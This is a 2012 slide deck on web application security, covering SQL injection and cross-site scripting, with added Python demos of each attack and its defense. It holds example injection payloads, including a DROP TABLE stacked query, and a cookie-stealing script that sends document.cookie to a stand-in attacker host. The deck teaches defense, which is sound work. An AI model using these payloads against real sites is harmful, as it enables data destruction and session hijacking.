Web Application Security


Web Application Security John Zaharopoulos ITS - Security 10/9/2012 1

Web App Security Trends
- Web 2.0: dynamic web pages
- Growth of Ajax / client-side JavaScript
- Hardening of OSes
- Secure by default
- Auto-patching and auto-updating

Recent Successful Attacks
- Sony Pictures: stolen admin details and passwords, 75,000 music codes
- LinkedIn: 6 million password hashes
- eHarmony: 1.5 million password hashes
- Yahoo: 450K passwords

OWASP Top 10 Threats

SQL Injection
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application.

SQL Injection Example 1
Code:
$password = mysql_query("select password FROM users WHERE password = '" . $pass . "';");
Attacker sends:
' OR 1 = 1 /*
Result:
SELECT password FROM users WHERE password = '' OR 1 = 1 /*
The attacker's leading quote closes the string literal, OR 1 = 1 makes the WHERE clause true for every row, and the /* opens a comment that swallows the closing quote and semicolon the code appends, so the query still parses. (The PHP mysql_* functions used here were removed in PHP 7; the pattern is the same with any API that builds SQL by string concatenation.)

SQL Injection Example 2
Code:
statement := "SELECT * FROM userinfo WHERE id = " + a_variable + ";"
Attacker sends:
1;DROP TABLE users
Result:
SELECT * FROM userinfo WHERE id = 1;DROP TABLE users;
Here the injected value is numeric, so no quote is needed to break out: the semicolon ends the intended statement and a second one follows. This stacked-query variant only works where the database API executes several statements in one call; many drivers (PHP's mysql_query among them) refuse it, which narrows what the attacker can do but does not remove the injection itself.

SQL Injection Defense
- Prepared Statements (Parameterized Queries): the developer defines all of the SQL code first, then passes each parameter to the query separately. The database can then distinguish code from data regardless of what input is supplied. This is the primary defense.
- Stored Procedures: the SQL is defined and stored in the database itself and called from the application, rather than built from something the user enters. (A stored procedure that itself assembles dynamic SQL from its arguments is still injectable.)
- Escaping all user-supplied input: each DBMS supports one or more character escaping schemes specific to certain kinds of queries. If all user-supplied input is escaped with the proper scheme for the database in use, the DBMS will not confuse that input with SQL code written by the developer. This is fragile (it depends on the DBMS, the connection character set and the query context) and should only be used where parameterization is not possible.
- Least Privilege: minimize the privileges assigned to every database account, so that it has enough permission to do its job, but no more. This limits what a successful injection can do (an account without DROP rights cannot carry out Example 2).
- White List Input Validation: detect unauthorized input before it is processed by the application, thereby preventing the attack.
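The two slide examples and the parameterized defense side by side, as an added example that is not part of the original slides. It uses Python's built-in sqlite3 module as a stand-in for the MySQL database behind the PHP snippet, with a constructed users table; the payloads are the ones from Example 1 and Example 2. sqlite3's executescript() is used to play the role of a DB API that accepts stacked statements, while execute() is the single-statement, parameterized path.

```python
import sqlite3

# Constructed sample schema and rows (not from the slides); SQLite stands in
# for the MySQL database the PHP snippet on the slide talks to.
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT);
INSERT INTO users VALUES (1, 'alice', 's3cret'), (2, 'bob', 'hunter2');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def count_matches_vulnerable(conn, pw):
    """Example 1 as written on the slide: pw is spliced into the SQL text,
    so a quote in pw ends the string literal and the rest is parsed as SQL."""
    sql = "SELECT password FROM users WHERE password = '" + pw + "';"
    return len(conn.execute(sql).fetchall())


def count_matches_safe(conn, pw):
    """Same query as a parameterized statement: the SQL text is fixed and pw
    is bound as a value, so it is never parsed as SQL whatever it contains."""
    sql = "SELECT password FROM users WHERE password = ?"
    return len(conn.execute(sql, (pw,)).fetchall())


def table_exists(conn, name):
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)
    ).fetchone()
    return row is not None


def select_by_id_stacked(conn, a_variable):
    """Example 2 under an API that runs several ';'-separated statements in one
    call (sqlite3's executescript here). The attacker's second statement runs.
    With plain execute() sqlite3 would refuse the second statement, which is
    why this payload works against some stacks and not others."""
    conn.executescript("SELECT * FROM users WHERE id = " + a_variable + ";")


def select_by_id_safe(conn, a_variable):
    """Parameterized form of Example 2: '1;DROP TABLE users' is just a value
    that matches no row, and only one statement can run."""
    sql = "SELECT id, name FROM users WHERE id = ?"
    return conn.execute(sql, (a_variable,)).fetchall()


def run_demo():
    """Returns the observations as a dict so each defense's effect is visible."""
    conn = make_db()
    payload1 = "' OR 1 = 1 /*"        # payload from Example 1
    payload2 = "1;DROP TABLE users"   # payload from Example 2
    results = {
        "vulnerable_rows": count_matches_vulnerable(conn, payload1),  # every row
        "safe_rows": count_matches_safe(conn, payload1),              # no rows
        "legit_rows": count_matches_safe(conn, "s3cret"),             # 1 row
        "safe_by_id": select_by_id_safe(conn, payload2),              # []
        "legit_by_id": select_by_id_safe(conn, "1"),                  # alice
    }
    select_by_id_stacked(conn, payload2)                              # table dropped
    results["users_table_survives"] = table_exists(conn, "users")
    return results


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The point to take from the run: the parameterized query returns the same rows as the concatenated one for a legitimate password but nothing for the attacker's payload, and the same query shape through execute() cannot be turned into a DROP TABLE at all. Least privilege would add a second layer here: a database account without DROP rights stops the stacked variant even when the driver allows it.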

Cross-Site Scripting (XSS)
Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into an otherwise benign and trusted web site. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user.

XSS Example 1a
Non-persistent / Reflected:
1. Alice often visits a particular website, which is hosted by Bob. Bob's website allows Alice to log in with a username/password pair and stores sensitive data, such as billing information.
2. Mallory observes that Bob's website contains a reflected XSS vulnerability.
3. Mallory crafts a URL to exploit the vulnerability, and sends Alice an email, enticing her to click on a link for the URL under false pretenses. This URL will point to Bob's website (either directly or through an iframe or Ajax), but will contain Mallory's malicious code, which the website will reflect.
4. Alice visits the URL provided by Mallory while logged into Bob's website.
5. The malicious script embedded in the URL executes in Alice's browser, as if it came directly from Bob's server (this is the actual XSS vulnerability).
6. The script can be used to send Alice's session cookie to Mallory.
7. Mallory can then use the session cookie to steal sensitive information available to Alice (authentication credentials, billing info, etc.) without Alice's knowledge.

XSS Example 1b

XSS Example 2
Persistent attack: Mallory posts a message with a malicious payload to a social network. When Bob reads the message, Mallory's XSS steals Bob's cookie. Mallory can now hijack Bob's session and impersonate Bob.

XSS Defense
- Escaping: transforming the data in such a way that the browser will not interpret it as code. Characters like "<" and "&" should be rewritten as HTML entities, "&lt;" and "&amp;". The escaping has to match the context the data lands in (HTML body, attribute value, URL, JavaScript); HTML entity escaping alone does not make a value safe to use as an href, for example.
- Validation and filtering: disallow users from entering special characters like <, or filter out those characters. Filtering on its own is easy to bypass (alternative encodings, contexts where no "<" is needed) and should complement output escaping, not replace it.
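The escaping rule above applied to the slides' scenario, as an added example not taken from the original slides. The untrusted strings are constructed payloads: a cookie-stealing script of the kind Mallory would reflect through Bob's site, an attribute break-out, and a javascript: URL; attacker.example and the page fragments are placeholders. Python's standard html.escape does the entity rewriting; the href case shows where escaping stops and validation (the second bullet) has to take over.

```python
import html
from urllib.parse import urlparse

# Constructed payloads (not from the slides): a cookie-stealing script for the
# HTML body, an attribute break-out, and a javascript: URL for an href.
SCRIPT_PAYLOAD = ('<script>new Image().src="http://attacker.example/?c="'
                  '+document.cookie</script>')
ATTR_PAYLOAD = '" onmouseover="alert(1)'
URL_PAYLOAD = "javascript:alert(document.cookie)"


def render_body_vulnerable(untrusted):
    """What the reflected-XSS scenario relies on: untrusted text copied
    straight into the page, so the browser parses it as markup."""
    return "<p>" + untrusted + "</p>"


def render_body(untrusted):
    """Escaping for the HTML body context: <, > and & become entities, so the
    browser displays the text instead of executing it."""
    return "<p>" + html.escape(untrusted, quote=False) + "</p>"


def render_attr(untrusted):
    """Escaping for a quoted attribute context: quote=True also converts the
    quote characters that would otherwise close the attribute early."""
    return '<input type="text" value="' + html.escape(untrusted, quote=True) + '">'


def render_link(untrusted_url):
    """Escaping is not enough when the value becomes a URL: 'javascript:'
    contains nothing to escape. Validate against an allow-list of schemes
    first (the slides' 'validation and filtering'), then escape for the
    attribute context. Returns None for a rejected URL."""
    if urlparse(untrusted_url).scheme.lower() not in ("http", "https"):
        return None
    return '<a href="' + html.escape(untrusted_url, quote=True) + '">link</a>'


def run_demo():
    """Returns each rendering so the difference between the paths is visible."""
    return {
        "vulnerable": render_body_vulnerable(SCRIPT_PAYLOAD),
        "escaped_body": render_body(SCRIPT_PAYLOAD),
        "escaped_attr": render_attr(ATTR_PAYLOAD),
        "rejected_link": render_link(URL_PAYLOAD),
        "accepted_link": render_link("https://example.com/?a=1&b=2"),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The escaped body still contains the attacker's text, but as &lt;script&gt;, which the browser renders literally; the attribute case needs the quotes escaped as well, otherwise the payload closes value="" and adds an onmouseover handler; and the URL case is rejected by scheme because no amount of entity escaping changes what javascript: means to the browser.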

Additional Resources
OWASP http://www.owasp.org/
SANS Institute http://www.sans.org/

Questions?